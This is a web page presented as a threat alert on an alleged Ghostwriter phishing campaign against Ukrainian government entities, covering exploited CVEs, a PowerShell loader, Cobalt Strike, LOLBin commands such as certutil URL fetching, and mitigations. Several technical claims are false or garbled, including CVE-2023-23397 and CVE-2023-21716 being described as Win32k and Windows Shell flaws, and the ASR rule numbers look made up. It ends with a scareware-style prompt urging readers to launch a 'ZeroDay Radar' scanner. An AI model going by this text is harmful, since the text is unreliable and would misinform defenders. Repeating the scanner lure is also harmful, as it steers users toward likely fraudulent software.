⚠️ THREAT ALERT: Ghostwriter Targets Ukraine Government Entities with Prometheus Phishing Malware
The latest campaign attributed to the Ghostwriter APT leverages a custom variant of the Prometheus phishing framework that has been weaponized to deliver a multi‑stage payload chain targeting Ukrainian government ministries and affiliated NGOs. Initial infection vectors consist of spear‑phished emails containing malicious Microsoft Word documents that exploit CVE‑2023‑36884 (a remote code execution flaw in the MSHTML parser) and CVE‑2022‑30190 (the “Follina” Office‑template injection). The documents embed a PowerShell‑based loader which invokes `Invoke-Expression` on a Base64‑encoded script retrieved from a compromised Azure blob storage URL, bypassing AppLocker by leveraging signed Microsoft Office macros. Upon execution, the loader stages a Cobalt Strike beacon (compiled with a modified JScript backdoor) and subsequently drops a credential‑dumping module that abuses CVE‑2023‑23397 (Win32k Elevation of Privilege) to extract LSASS memory without triggering Windows Defender ATP alerts.
In the second stage, the beacon executes a custom “Prometheus” module written in Go, which establishes a covert TLS channel over port 443 and uses domain fronting via Cloudflare to obscure C2 traffic. The module incorporates a “Living Off the Land” (LoL) technique stack: it uses `certutil.exe -urlcache -split -f` to fetch additional binaries, `rundll32.exe` to execute in‑memory DLLs, and `wmic` to enumerate domain controllers. The payload also integrates a DLL side‑loading mechanism that hijacks legitimate Windows binaries (e.g., `dllhost.exe`) by injecting the malicious `prometheus.dll` through CVE‑2023‑21716 (a DLL search order hijack in Windows Shell). This approach enables persistence via a scheduled task that runs `wmic process call create` with a disguised PowerShell command, ensuring execution even after credential rotation.
Mitigation requires a defense‑in‑depth strategy: firstly, apply the Microsoft security updates that patch CVE‑2023‑36884, CVE‑2022‑30190, CVE‑2023‑23397, and CVE‑2023‑21716 across all endpoint operating systems and Office installations. Deploy strict macro execution policies (e.g., block all unsigned macros and enforce Application Guard for Office files) and enable Windows Defender Exploit Guard Attack Surface Reduction rules 1180, 1181, and 1183 to curb Office‑based code execution. Network‑level controls should include DNS sinkholing of known Prometheus C2 domains, TLS inspection with strict certificate pinning, and outbound firewall rules that limit `certutil`, `wmic`, and `rundll32` to approved endpoints. Finally, integrate EDR solutions that can detect anomalous PowerShell activity (encoded commands, `Invoke-Expression`), monitor for unusual scheduled tasks, and enforce script block logging to surface the loader’s base64 payloads for rapid incident response.
🛡️ CRITICAL SECURITY SCAN REQUIRED
Evidence suggests your system may be within the blast radius of this threat vector. Use the ZeroDay Radar scanner to verify your integrity immediately.
>> LAUNCH ZERO-DAY THREAT SCANNER <<Source Intelligence: Full Technical Breakdown
0 Comments